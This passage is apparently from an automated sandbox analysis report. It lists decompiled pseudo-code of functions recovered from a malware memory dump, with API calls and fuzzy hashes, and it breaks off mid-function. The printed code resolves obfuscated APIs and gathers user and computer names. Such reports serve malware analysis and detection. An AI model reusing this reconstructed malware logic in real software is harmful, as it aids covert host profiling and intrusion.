                                                          • CloseHandle.KERNEL32(?), ref: 04678F92
                                                          • GetLastError.KERNEL32(00000001), ref: 04678F96
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: 4fd13d72644aa28e3bd1daba2a4a577e38dcff6cdc4bd5a232415f198fc4e22c
                                                          • Instruction ID: 5eb2cb417093c94b1ad53fe867708f6fa15291427f2c49ce1901efd0f2841ada
                                                          • Opcode Fuzzy Hash: 4fd13d72644aa28e3bd1daba2a4a577e38dcff6cdc4bd5a232415f198fc4e22c
                                                          • Instruction Fuzzy Hash: 28311DB6900208BFDB11AFA4DC88D9EBBBDEF48354F104469E606A7250F739AD45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E04671BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t13;
                                                          				char* _t28;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				char* _t36;
                                                          				intOrPtr* _t40;
                                                          				char* _t41;
                                                          				char* _t42;
                                                          				char* _t43;
                                                          
                                                          				_t34 = __edx;
                                                          				_push(__ecx);
                                                          				_t9 =  *0x467d2a8; // 0x47a5a8
                                                          				_t1 = _t9 + 0x467e62c; // 0x253d7325
                                                          				_t36 = 0;
                                                          				_t28 = E0467173D(__ecx, _t1);
                                                          				if(_t28 != 0) {
                                                          					_t40 = __imp__;
                                                          					_t13 =  *_t40(_t28);
                                                          					_v8 = _t13;
                                                          					_t41 = E0467A71F(_v8 +  *_t40(_a4) + 1);
                                                          					if(_t41 != 0) {
                                                          						strcpy(_t41, _t28);
                                                          						_pop(_t33);
                                                          						__imp__(_t41, _a4);
                                                          						_t36 = E046764EF(_t34, _t41, _a8);
                                                          						E0467A734(_t41);
                                                          						_t42 = E04676467(StrTrimA(_t36, "="), _t36);
                                                          						if(_t42 != 0) {
                                                          							E0467A734(_t36);
                                                          							_t36 = _t42;
                                                          						}
                                                          						_t43 = E046717E5(_t36, _t33);
                                                          						if(_t43 != 0) {
                                                          							E0467A734(_t36);
                                                          							_t36 = _t43;
                                                          						}
                                                          					}
                                                          					E0467A734(_t28);
                                                          				}
                                                          				return _t36;
                                                          			}















                                                          APIs
                                                            • Part of subcall function 0467173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,04671BD0,253D7325,00000000,00000000,7742C740,?,?,046720C2,?), ref: 046717A4
                                                            • Part of subcall function 0467173D: sprintf.NTDLL ref: 046717C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046720C2,?,04AF95B0), ref: 04671BE1
                                                          • lstrlen.KERNEL32(?,?,?,046720C2,?,04AF95B0), ref: 04671BE9
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • strcpy.NTDLL ref: 04671C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04671C0B
                                                            • Part of subcall function 046764EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04671C1A,00000000,?,?,?,046720C2,?,04AF95B0), ref: 04676506
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046720C2,?,04AF95B0), ref: 04671C28
                                                            • Part of subcall function 04676467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04671C34,00000000,?,?,046720C2,?,04AF95B0), ref: 04676471
                                                            • Part of subcall function 04676467: _snprintf.NTDLL ref: 046764CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 1a90b53962f3a75ba5b549a1a311e69ed0c751330e82c98256bc089489afd419
                                                          • Instruction ID: 7974963985322599a8fb391f88ed516f5076c16689373cd9e8f343dc7771a13e
                                                          • Opcode Fuzzy Hash: 1a90b53962f3a75ba5b549a1a311e69ed0c751330e82c98256bc089489afd419
                                                          • Instruction Fuzzy Hash: D411C27B501625779716BBF49C84CAE3BAD9F86669315411AFA049B300FE38ED0287A4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 046768EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 046768FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04676911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04676979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04676988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04676993
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 1fdc8dd878495c545c0f3d3562f25d286f476d14ce51e20e673465777a2ac2e2
                                                          • Instruction ID: 6b4bb556ba489113447893910ddd73a3063c1e7f9ae41da0cb0ac8f2beb7e6a5
                                                          • Opcode Fuzzy Hash: 1fdc8dd878495c545c0f3d3562f25d286f476d14ce51e20e673465777a2ac2e2
                                                          • Instruction Fuzzy Hash: D4415336D00A09AFDB01DFBCD84469FB7B9EF89310F144465E914EB260EA71ED05CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0467592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				intOrPtr _t30;
                                                          				_Unknown_base(*)()* _t32;
                                                          				intOrPtr _t33;
                                                          				_Unknown_base(*)()* _t35;
                                                          				intOrPtr _t36;
                                                          				_Unknown_base(*)()* _t38;
                                                          				intOrPtr _t39;
                                                          				_Unknown_base(*)()* _t41;
                                                          				intOrPtr _t44;
                                                          				struct HINSTANCE__* _t48;
                                                          				intOrPtr _t54;
                                                          
                                                          				_t54 = E0467A71F(0x20);
                                                          				if(_t54 == 0) {
                                                          					_v8 = 8;
                                                          				} else {
                                                          					_t23 =  *0x467d2a8; // 0x47a5a8
                                                          					_t1 = _t23 + 0x467e11a; // 0x4c44544e
                                                          					_t48 = GetModuleHandleA(_t1);
                                                          					_t26 =  *0x467d2a8; // 0x47a5a8
                                                          					_t2 = _t26 + 0x467e769; // 0x7243775a
                                                          					_v8 = 0x7f;
                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                          					 *(_t54 + 0xc) = _t28;
                                                          					if(_t28 == 0) {
                                                          						L8:
                                                          						E0467A734(_t54);
                                                          					} else {
                                                          						_t30 =  *0x467d2a8; // 0x47a5a8
                                                          						_t5 = _t30 + 0x467e756; // 0x614d775a
                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                          						 *(_t54 + 0x10) = _t32;
                                                          						if(_t32 == 0) {
                                                          							goto L8;
                                                          						} else {
                                                          							_t33 =  *0x467d2a8; // 0x47a5a8
                                                          							_t7 = _t33 + 0x467e40b; // 0x6e55775a
                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                          							 *(_t54 + 0x14) = _t35;
                                                          							if(_t35 == 0) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t36 =  *0x467d2a8; // 0x47a5a8
                                                          								_t9 = _t36 + 0x467e4d2; // 0x4e6c7452
                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                          								 *(_t54 + 0x18) = _t38;
                                                          								if(_t38 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									_t39 =  *0x467d2a8; // 0x47a5a8
                                                          									_t11 = _t39 + 0x467e779; // 0x6c43775a
                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                          									 *(_t54 + 0x1c) = _t41;
                                                          									if(_t41 == 0) {
                                                          										goto L8;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                          										_t44 = E04676604(_t54, _a8);
                                                          										_v8 = _t44;
                                                          										if(_t44 != 0) {
                                                          											goto L8;
                                                          										} else {
                                                          											 *_a12 = _t54;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}



















                                                          APIs
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04678EBD,?,00000001,?,?,00000000,00000000), ref: 04675952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04675974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 0467598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 046759A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 046759B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 046759CC
                                                            • Part of subcall function 04676604: memset.NTDLL ref: 04676683
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: 72c67f69ce40cea8b42904fe314f3b08c5dc5b0b8bf7fff584dd25ae30bd37c3
                                                          • Instruction ID: ba71b28c2614830e9a167bd857f551771292ca8769871ffbd710992fca1d7c46
                                                          • Opcode Fuzzy Hash: 72c67f69ce40cea8b42904fe314f3b08c5dc5b0b8bf7fff584dd25ae30bd37c3
                                                          • Instruction Fuzzy Hash: 282180B421074AAFD710DFA9C884D5AB7ECEF5430470195A6EA0AC7311FB34ED498F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E0467853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				char _v284;
                                                          				void* __esi;
                                                          				char* _t59;
                                                          				intOrPtr* _t60;
                                                          				intOrPtr _t64;
                                                          				char _t65;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t71;
                                                          				void* _t73;
                                                          				signed int _t81;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				char _t98;
                                                          				signed int* _t100;
                                                          				intOrPtr* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t92 = __ecx;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t98 = _a16;
                                                          				if(_t98 == 0) {
                                                          					__imp__( &_v284,  *0x467d33c);
                                                          					_t91 = 0x80000002;
                                                          					L6:
                                                          					_t59 = E04679070( &_v284,  &_v284);
                                                          					_a8 = _t59;
                                                          					if(_t59 == 0) {
                                                          						_v8 = 8;
                                                          						L29:
                                                          						_t60 = _a20;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 =  *_t60 + 1;
                                                          						}
                                                          						return _v8;
                                                          					}
                                                          					_t101 = _a24;
                                                          					if(E04676E98(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                          						L27:
                                                          						E0467A734(_a8);
                                                          						goto L29;
                                                          					}
                                                          					_t64 =  *0x467d278; // 0x4af9a98
                                                          					_t16 = _t64 + 0xc; // 0x4af9b66
                                                          					_t65 = E04679070(_t64,  *_t16);
                                                          					_a24 = _t65;
                                                          					if(_t65 == 0) {
                                                          						L14:
                                                          						_t29 = _t101 + 0x14; // 0x102
                                                          						_t33 = _t101 + 0x10; // 0x3d0467c0
                                                          						if(E046722F1(_t97,  *_t33, _t91, _a8,  *0x467d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                          							_t68 =  *0x467d2a8; // 0x47a5a8
                                                          							if(_t98 == 0) {
                                                          								_t35 = _t68 + 0x467ea3f; // 0x4d4c4b48
                                                          								_t69 = _t35;
                                                          							} else {
                                                          								_t34 = _t68 + 0x467e8e7; // 0x55434b48
                                                          								_t69 = _t34;
                                                          							}
                                                          							if(E04676C38(_t69,  *0x467d334,  *0x467d338,  &_a24,  &_a16) == 0) {
                                                          								if(_t98 == 0) {
                                                          									_t71 =  *0x467d2a8; // 0x47a5a8
                                                          									_t44 = _t71 + 0x467e846; // 0x74666f53
                                                          									_t73 = E04679070(_t44, _t44);
                                                          									_t99 = _t73;
                                                          									if(_t73 == 0) {
                                                          										_v8 = 8;
                                                          									} else {
                                                          										_t47 = _t101 + 0x10; // 0x3d0467c0
                                                          										E04675D7D( *_t47, _t91, _a8,  *0x467d338, _a24);
                                                          										_t49 = _t101 + 0x10; // 0x3d0467c0
                                                          										E04675D7D( *_t49, _t91, _t99,  *0x467d330, _a16);
                                                          										E0467A734(_t99);
                                                          									}
                                                          								} else {
                                                          									_t40 = _t101 + 0x10; // 0x3d0467c0
                                                          									E04675D7D( *_t40, _t91, _a8,  *0x467d338, _a24);
                                                          									_t43 = _t101 + 0x10; // 0x3d0467c0
                                                          									E04675D7D( *_t43, _t91, _a8,  *0x467d330, _a16);
                                                          								}
                                                          								if( *_t101 != 0) {
                                                          									E0467A734(_a24);
                                                          								} else {
                                                          									 *_t101 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					_t21 = _t101 + 0x10; // 0x3d0467c0
                                                          					_t81 = E04678BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                          					if(_t81 == 0) {
                                                          						_t100 = _v16;
                                                          						if(_v12 == 0x28) {
                                                          							 *_t100 =  *_t100 & _t81;
                                                          							_t26 = _t101 + 0x10; // 0x3d0467c0
                                                          							E046722F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                          						}
                                                          						E0467A734(_t100);
                                                          						_t98 = _a16;
                                                          					}
                                                          					E0467A734(_a24);
                                                          					goto L14;
                                                          				}
                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                          					goto L29;
                                                          				} else {
                                                          					_t97 = _a8;
                                                          					E0467A749(_t98, _a8,  &_v284);
                                                          					__imp__(_t102 + _t98 - 0x117,  *0x467d33c);
                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                          					_t91 = 0x80000003;
                                                          					goto L6;
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(04673741,0000005F,00000000,00000000,00000104), ref: 04678572
                                                          • lstrcpy.KERNEL32(?,?), ref: 0467859F
                                                            • Part of subcall function 04679070: lstrlen.KERNEL32(?,00000000,04AF9A98,00000000,04678808,04AF9C76,?,?,?,?,?,63699BC3,00000005,0467D00C), ref: 04679077
                                                            • Part of subcall function 04679070: mbstowcs.NTDLL ref: 046790A0
                                                            • Part of subcall function 04679070: memset.NTDLL ref: 046790B2
                                                            • Part of subcall function 04675D7D: lstrlenW.KERNEL32(?,?,?,04678708,3D0467C0,80000002,04673741,0467A513,74666F53,4D4C4B48,0467A513,?,3D0467C0,80000002,04673741,?), ref: 04675DA2
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 046785C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: e9c02cdad20aca4ad9af51bc62a87193c941e216d3db4a4aa8b6b26d8c497ae6
                                                          • Instruction ID: 9ebb28208f95a06ff74eb0dcd76c92e96171cc01fe68aae40bb76fc1bdddee90
                                                          • Opcode Fuzzy Hash: e9c02cdad20aca4ad9af51bc62a87193c941e216d3db4a4aa8b6b26d8c497ae6
                                                          • Instruction Fuzzy Hash: EC512976100209BFEF15AFA1DD48E9E7BB9EF44354F008918FA1696220F73AED15AB10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0467A199() {
                                                          				long _v8;
                                                          				long _v12;
                                                          				int _v16;
                                                          				long _t39;
                                                          				long _t43;
                                                          				signed int _t47;
                                                          				short _t51;
                                                          				signed int _t52;
                                                          				int _t56;
                                                          				int _t57;
                                                          				char* _t64;
                                                          				short* _t67;
                                                          
                                                          				_v16 = 0;
                                                          				_v8 = 0;
                                                          				GetUserNameW(0,  &_v8);
                                                          				_t39 = _v8;
                                                          				if(_t39 != 0) {
                                                          					_v12 = _t39;
                                                          					_v8 = 0;
                                                          					GetComputerNameW(0,  &_v8);
                                                          					_t43 = _v8;
                                                          					if(_t43 != 0) {
                                                          						_v12 = _v12 + _t43 + 2;
                                                          						_t64 = E0467A71F(_v12 + _t43 + 2 << 2);
                                                          						if(_t64 != 0) {
                                                          							_t47 = _v12;
                                                          							_t67 = _t64 + _t47 * 2;
                                                          							_v8 = _t47;
                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                          								L7:
                                                          								E0467A734(_t64);
                                                          							} else {
                                                          								_t51 = 0x40;
                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                          								_t52 = _v8;
                                                          								_v12 = _v12 - _t52;
                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                          									goto L7;
                                                          								} else {
                                                          									_t56 = _v12 + _v8;
                                                          									_t31 = _t56 + 2; // 0x4671fd4
                                                          									_v12 = _t56;
                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                          									_v8 = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L7;
                                                          									} else {
                                                          										_t64[_t57] = 0;
                                                          										_v16 = _t64;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,04671FD2), ref: 0467A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,04671FD2), ref: 0467A1C9
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • GetUserNameW.ADVAPI32(00000000,04671FD2), ref: 0467A203
                                                          • GetComputerNameW.KERNEL32(04671FD2,?), ref: 0467A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04671FD2,00000000,04671FD4,00000000,00000000,?,?,04671FD2), ref: 0467A249
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: e416aa24769779c8ccbe765aeda396a41a894980898b5a7e95b4829911f60c15
                                                          • Instruction ID: 4fce62202fa72db62ae738c7f017c3fdb87d6b8d14ce5478dd428aef69c317d6
                                                          • Opcode Fuzzy Hash: e416aa24769779c8ccbe765aeda396a41a894980898b5a7e95b4829911f60c15
                                                          • Instruction Fuzzy Hash: 56210A76A01208FFDB15DFE4C9848EEBBB8FF44304B1444AAE601E7244E635AB44DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E04673DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __esi;
                                                          				long _t10;
                                                          				void* _t18;
                                                          				void* _t22;
                                                          
                                                          				_t9 = __eax;
                                                          				_t22 = __eax;
                                                          				if(_a4 != 0 && E04675AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                          					L9:
                                                          					return GetLastError();
                                                          				}
                                                          				_t10 = E0467A81C(_t9, _t18, _t22, _a8);
                                                          				if(_t10 == 0) {
                                                          					ResetEvent( *(_t22 + 0x1c));
                                                          					ResetEvent( *(_t22 + 0x20));
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0xffffffff);
                                                          					_push(0);
                                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                          					if( *0x467d128() != 0) {
                                                          						SetEvent( *(_t22 + 0x1c));
                                                          						goto L7;
                                                          					} else {
                                                          						_t10 = GetLastError();
                                                          						if(_t10 == 0x3e5) {
                                                          							L7:
                                                          							_t10 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				if(_t10 == 0xffffffff) {
                                                          					goto L9;
                                                          				}
                                                          				return _t10;
                                                          			}








                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,046767B8,?,?,00000000,00000000), ref: 04673E23
                                                          • ResetEvent.KERNEL32(?), ref: 04673E28
                                                          • GetLastError.KERNEL32 ref: 04673E40
                                                          • GetLastError.KERNEL32(?,?,00000102,046767B8,?,?,00000000,00000000), ref: 04673E5B
                                                            • Part of subcall function 04675AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04673E08,?,?,?,?,00000102,046767B8,?,?,00000000), ref: 04675AFD
                                                            • Part of subcall function 04675AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04673E08,?,?,?,?,00000102,046767B8,?), ref: 04675B5B
                                                            • Part of subcall function 04675AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04675B6B
                                                          • SetEvent.KERNEL32(?), ref: 04673E4E
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: fab5666065767bb8f50ea357b59f4d2908effebb81ab172ad2a5526d98fd54a3
                                                          • Instruction ID: b07aa4a5b82b13fcc27a89bfce787e63be2c23becce3b505acbc582f80dc3546
                                                          • Opcode Fuzzy Hash: fab5666065767bb8f50ea357b59f4d2908effebb81ab172ad2a5526d98fd54a3
                                                          • Instruction Fuzzy Hash: A6016231104201ABDB306F71DC44F1BB7A4EF54768F104A26F991D12E0F721F885EBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04673E69(intOrPtr _a4) {
                                                          				void* _t2;
                                                          				unsigned int _t4;
                                                          				void* _t5;
                                                          				long _t6;
                                                          				void* _t7;
                                                          				void* _t15;
                                                          
                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                          				 *0x467d26c = _t2;
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				_t4 = GetVersion();
                                                          				if(_t4 != 5) {
                                                          					L4:
                                                          					if(_t15 <= 0) {
                                                          						_t5 = 0x32;
                                                          						return _t5;
                                                          					}
                                                          					L5:
                                                          					 *0x467d25c = _t4;
                                                          					_t6 = GetCurrentProcessId();
                                                          					 *0x467d258 = _t6;
                                                          					 *0x467d264 = _a4;
                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                          					 *0x467d254 = _t7;
                                                          					if(_t7 == 0) {
                                                          						 *0x467d254 =  *0x467d254 | 0xffffffff;
                                                          					}
                                                          					return 0;
                                                          				}
                                                          				if(_t4 >> 8 > 0) {
                                                          					goto L5;
                                                          				}
                                                          				_t15 = _t4 - _t4;
                                                          				goto L4;
                                                          			}










                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0467131F,?,?,00000001,?,?,?,04674EF2,?), ref: 04673E71
                                                          • GetVersion.KERNEL32(?,00000001,?,?,?,04674EF2,?), ref: 04673E80
                                                          • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04674EF2,?), ref: 04673E9C
                                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04674EF2,?), ref: 04673EB9
                                                          • GetLastError.KERNEL32(?,00000001,?,?,?,04674EF2,?), ref: 04673ED8
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                          • String ID:
                                                          • API String ID: 2270775618-0
                                                          • Opcode ID: 50733037c8fb9aa88b88007f918c6213d18c5fc34afe4e13c9d4bc306386f4fc
                                                          • Instruction ID: 9e9408c52429ffa2fd4d4249248da103a3a7ef6bedd2631c2088296d1c1c5fc2
                                                          • Opcode Fuzzy Hash: 50733037c8fb9aa88b88007f918c6213d18c5fc34afe4e13c9d4bc306386f4fc
                                                          • Instruction Fuzzy Hash: 3EF0AF70640302ABE7288F24A819B193B61EBC0701F201916EB13CA3C0F779E8C2DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 46%
                                                          			E04676F3A(intOrPtr* __eax) {
                                                          				void* _v8;
                                                          				WCHAR* _v12;
                                                          				void* _v16;
                                                          				char _v20;
                                                          				void* _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v32;
                                                          				intOrPtr _v40;
                                                          				short _v48;
                                                          				intOrPtr _v56;
                                                          				short _v64;
                                                          				intOrPtr* _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr* _t58;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          				intOrPtr* _t63;
                                                          				intOrPtr* _t65;
                                                          				short _t67;
                                                          				intOrPtr* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t72;
                                                          				intOrPtr* _t75;
                                                          				intOrPtr* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t87;
                                                          				intOrPtr _t103;
                                                          				intOrPtr _t109;
                                                          				void* _t118;
                                                          				void* _t122;
                                                          				void* _t123;
                                                          				intOrPtr _t130;
                                                          
                                                          				_t123 = _t122 - 0x3c;
                                                          				_push( &_v8);
                                                          				_push(__eax);
                                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                          				if(_t118 >= 0) {
                                                          					_t54 = _v8;
                                                          					_t103 =  *0x467d2a8; // 0x47a5a8
